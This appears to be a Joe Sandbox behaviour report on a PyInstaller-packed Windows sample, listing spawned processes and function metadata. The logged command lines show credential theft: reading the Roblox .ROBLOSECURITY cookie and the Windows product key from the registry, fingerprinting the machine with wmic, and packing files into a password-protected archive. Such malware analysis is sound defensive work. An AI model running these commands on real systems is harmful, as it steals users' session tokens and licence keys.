Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6280, Parent PID: 7964

General

Target ID:	94
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	02:37:37
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	02:37:37
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	02:37:37
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
Imagebase:	0x7ff7cf880000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	02:37:46
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	02:37:46
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	02:37:46
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	02:37:47
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	02:37:47
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	02:37:47
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	02:37:48
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3752, Parent PID: 3856

General

Target ID:	112
Start time:	02:37:48
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	02:37:48
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	02:37:49
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	02:37:49
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	02:37:49
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	117
Start time:	02:37:50
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3360, Parent PID: 3276

General

Target ID:	118
Start time:	02:37:50
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	02:37:50
Start date:	13/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7d8db0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	02:37:51
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	02:37:51
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	02:37:52
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00007FF7F91E8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8C46

Part of subcall function 00007FF7F91FA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FA500

Part of subcall function 00007FF7F91F878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8CD6
CreateProcessW.KERNELBASE ref: 00007FF7F91E8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8D18

Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99

RegisterClassW.USER32 ref: 00007FF7F91E8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8D7B
CreateWindowExW.USER32 ref: 00007FF7F91E8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E05
PeekMessageW.USER32 ref: 00007FF7F91E8E29
TranslateMessage.USER32 ref: 00007FF7F91E8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E41
PeekMessageW.USER32 ref: 00007FF7F91E8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF7F91E9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E901F

Strings

CreateProcessW, xrefs: 00007FF7F91E8D27
PyInstaller Onefile Hidden Window, xrefs: 00007FF7F91E8D85
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7F91E8D44
Failed to create child process!, xrefs: 00007FF7F91E8D20

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 7bda02531730b8b89590b024f1c7978ae2ea06bbc3aa9d10b1d93ce67a436a7b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: D6D15331E08A4686FB60AF34EC542ADB774FB84B58F900235DA6E536E8DF3CE5458790

Function 00007FF7F91E1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pyi-disable-windowed-traceback, xrefs: 00007FF7F91E3BB2
MEI, xrefs: 00007FF7F91E3933
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7F91E3A0B, 00007FF7F91E3CD4, 00007FF7F91E3F6B
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7F91E3971
pyi-contents-directory, xrefs: 00007FF7F91E3B8D
Could not create temporary directory!, xrefs: 00007FF7F91E3CBF
Failed to start splash screen!, xrefs: 00007FF7F91E3ED4
pkg, xrefs: 00007FF7F91E39BE
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7F91E3E0A
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7F91E3EA6
Failed to convert DLL search path!, xrefs: 00007FF7F91E3DDC
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7F91E39DE
Failed to load splash screen resources!, xrefs: 00007FF7F91E3E85
_PYI_SPLASH_IPC, xrefs: 00007FF7F91E3A23, 00007FF7F91E3EF5
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7F91E3882, 00007FF7F91E38AF
VCRUNTIME140.dll, xrefs: 00007FF7F91E3DB1
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7F91E3B32
Failed to remove temporary directory: %s, xrefs: 00007FF7F91E3FC3
Py_GIL_DISABLED, xrefs: 00007FF7F91E3AF4
pyi-python-flag, xrefs: 00007FF7F91E3AD6
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7F91E3C61
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7F91E3BE8
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7F91E3D12
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7F91E3A17, 00007FF7F91E3A2F, 00007FF7F91E3A9B
bye-runtime-tmpdir, xrefs: 00007FF7F91E3B68
_PYI_ARCHIVE_FILE, xrefs: 00007FF7F91E38D2, 00007FF7F91E39FF
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7F91E3D35
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7F91E3EBB

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction ID: 12aa85ab2cdde0f70342b0a0d965ed073491b76ac979dd2920709a4b0a1ace95
Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction Fuzzy Hash: 12328221E0868252FB69FF25AC542B9E671AF44780FC44032DA7D432DAEF2CF555C3A2

Function 00007FF7F92069D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9206749
Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92067C7
Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9206818

CreateFileW.KERNELBASE ref: 00007FF7F9206ADA
CreateFileW.KERNEL32 ref: 00007FF7F9206B2A
GetLastError.KERNEL32 ref: 00007FF7F9206B5A
GetFileType.KERNELBASE ref: 00007FF7F9206B6F
GetLastError.KERNEL32 ref: 00007FF7F9206B79
CloseHandle.KERNEL32 ref: 00007FF7F9206BAC
CloseHandle.KERNEL32 ref: 00007FF7F9206D0F
CreateFileW.KERNEL32 ref: 00007FF7F9206D44
GetLastError.KERNEL32 ref: 00007FF7F9206D53

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: ff76232cbed7a30bc7e6238ef5c919e726191a7b62a03495e9491e3e2f0634fa
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: CAC1AC32B28A4585FB50EF69D8902AC7771FB49B98B814335DA2E977E8DF38D051C390

Function 00007FF7F91E83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E841B
RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E849E
DeleteFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84BD
FindNextFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84CB
FindClose.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84DC
RemoveDirectoryW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84E5

Strings

%s\*, xrefs: 00007FF7F91E83E2

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: fdff8ec491896a23328cbf41d2d808ff7423be29052fd79de16381446acd9fcc
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 47412F21E0C54286EF75BF14BC446B9A3B0FB94754FC00671D56E826DCDF2CE54587A1

Function 00007FF7F91E92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7F91E9323
FindClose.KERNELBASE ref: 00007FF7F91E9332

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

